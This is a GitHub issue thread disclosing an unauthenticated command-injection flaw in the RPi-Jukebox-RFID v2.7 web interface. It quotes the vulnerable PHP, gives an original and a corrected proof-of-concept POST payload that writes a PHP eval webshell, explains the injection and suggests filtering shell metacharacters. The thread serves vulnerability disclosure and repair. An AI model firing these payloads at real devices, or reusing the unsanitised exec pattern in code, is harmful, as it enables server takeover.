MiczFlor/RPi-Jukebox-RFID #2396: 🐛 | RPi-Jukebox-RFID V2.7_RCE_1

xjzzzxx, 2024-07-11:
### Version

v2.7.0

### Branch

released 

### OS

ubuntu 22

### Pi model

unknown

### What happened?

Hello,

I would like to report for a RCE vulnerability in RPi-Jukebox-RFID-v2.7(**No permissions required**)

# Analysis

The path of the vulnerability: htdocs\inc.setWlanIpMail.php

```php
if(isset($_POST['WlanIpMailYN']) && trim($_POST['WlanIpMailYN']) != "") {	// Line 16(check point)
    if(trim($_POST['WlanIpMailYN']) == "ON") {	// Line 20-26 (check point)
        // break
    } elseif(trim($_POST['WlanIpMailYN']) == "OFF") { // Line 27-34 (check point)
		// break
    }
    $WlanIpMailAddr = trim($_POST['WlanIpMailAddr']); // Line 36(Source)
    $exec = 'echo "'.$WlanIpMailAddr.'" > '.$conf['settings_abs'].'/WlanIpMailAddr';
    exec($exec);		// Line 41(Sink)
}
```

Source from Line 36 (`$_POST['WlanIpMailAddr']`). 

And then there are three check point ,which we should set `$_POST['WlanIpMailYN'] = 1` to bypass. 

After bypass three check point, the source(tainted) pass to `$WlanIpMailAddr` and `exec($exec);`(Line 52) without another check.

# Poc

`POST /htdocs/inc.setWlanIpMail.php `

Data:

`WlanIpMailYN=1&WlanIpMailAddr=hello%22+%3b+echo+%22%3c%3fphp+%40eval(%24_POST%5b%27pass%27%5d)+%3f%3e%22++%3e+.%2fshell.php++%3b+echo+%22hello`

Here is Data without url encoding for ease of understanding:

`WlanIpMailYN=1&WlanIpMailAddr=hello" ; echo "<?php @eval($_POST['pass']) ?>"  > ./shell.php  ; echo "hello`

# Manual verification

[image]

[image]

The attacker can then easily connect to this webshell(/htdocs/shell.php)

xjzzzxx, 2024-07-12:
I'm sorry for the issue with the PoC I wrote earlier. I forgot to escape @, which resulted in the generated webshell being unusable. Here is the correct PoC:

# Poc_fixed

`POST /htdocs/inc.setWlanIpMail.php `

Data

`WlanIpMailYN=1&WlanIpMailAddr=hello%22+%3b+echo+%22%3c%3fphp+%40eval(%5c%24_POST%5b%27shell1%27%5d)+%3f%3e%22++%3e+.%2fshell.php++%3b+echo+%22hello`

Here is Data without url encoding for ease of understanding:

`WlanIpMailYN=1&WlanIpMailAddr=hello" ; echo "<?php @eval(\$_POST['shell1']) ?>"  > ./shell.php  ; echo "hello`

Manual verification

[image]

[image]

s-martin, 2024-07-13:
Thanks for bringing that up.

If you want you could also open a PR which would fix these issues l.

Btw, not sure what PoC means.

xjzzzxx, 2024-07-13:
Thank you for your reply. Recently, I have been focusing on reporting vulnerabilities in multiple web applications, so I am unable to help you fix this issue in the short term.

# How does this POC work

For this series of issues, it is essentially because the part of the code that executes commands is introduced without checking the data submitted by the user. Taking this RCE vulnerability as an example:

```
$WlanIpMailAddr = trim($_POST['WlanIpMailAddr']); // Line 36(Source)
$exec = 'echo "'.$WlanIpMailAddr.'" > '.$conf['settings_abs'].'/WlanIpMailAddr';
exec($exec);		// Line 41(Sink)
```

The value of `$_POST['WlanIpMailAddr'] ` could be controled, Make the command `'echo "'.$WlanIpMailAddr.'" > '.$conf['settings_abs'].'/WlanIpMailAddr';` controllable as well.

When the commands executed by the program can be controlled by the user, it is easy to produce unexpected effects. For hackers, they are committed to uploading some Trojans to gain control of the server.

The effect of this PoC is to make the executed command look like the following:

`echo "hello" ; echo "<?php @eval($_POST['pass']) ?>"  > ./shell.php  ; echo "hello" > '.$conf['settings_abs'].'/WlanIpMailAddr`

It can be noted that the semicolon(;) in PoC enable the execution of multiple commands here, with the second command writing a webshell named shell.php to the file system (`echo "<?php @eval($_POST['pass']) ?>"  > ./shell.php `)，which Enable hackers to gain control of the server through this webshell.

# How to fix
Because I don't have time to open a PR to fix these vulnerabilities in the short term，I am here to provide some fix suggestions：

1. Strengthen the filtering of user input, and focus on filtering the concatenated characters of commands，such as `; | & ' "`

I hope it can help you

> Thanks for bringing that up.
> 
> If you want you could also open a PR which would fix these issues.